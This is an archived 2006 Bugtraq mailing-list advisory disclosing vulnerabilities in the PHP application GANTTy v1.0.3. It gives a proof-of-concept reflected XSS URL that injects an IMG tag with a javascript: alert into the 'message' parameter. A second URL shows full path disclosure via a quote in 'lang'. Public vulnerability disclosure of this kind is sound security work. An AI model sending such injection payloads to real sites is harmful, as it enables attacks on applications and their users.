GANTTy v1.0.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: GANTTy v1.0.3
From: luny@xxxxxxxxxxxxxxx
Date: 6 Jun 2006 03:42:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

GANTTy v1.0.3

Homepage:
http://www.gantty.com

Effected files:
index.php

XSS Vulnerabilities PoC:

XSS Vulnerability:
http://www.example.com/index.php?action=login&message=<IMG 
SRC=javascript:alert('XSS')>+email&lang=


Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE /var/www/username/actions/authenticate.php

Prev by Date: Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit
Next by Date: Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix
Previous by thread: [ MDKSA-2006:095 ] - Updated libtiff packages fixes tiffsplit vulnerability
Next by thread: Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix
Index(es):
- Date
- Thread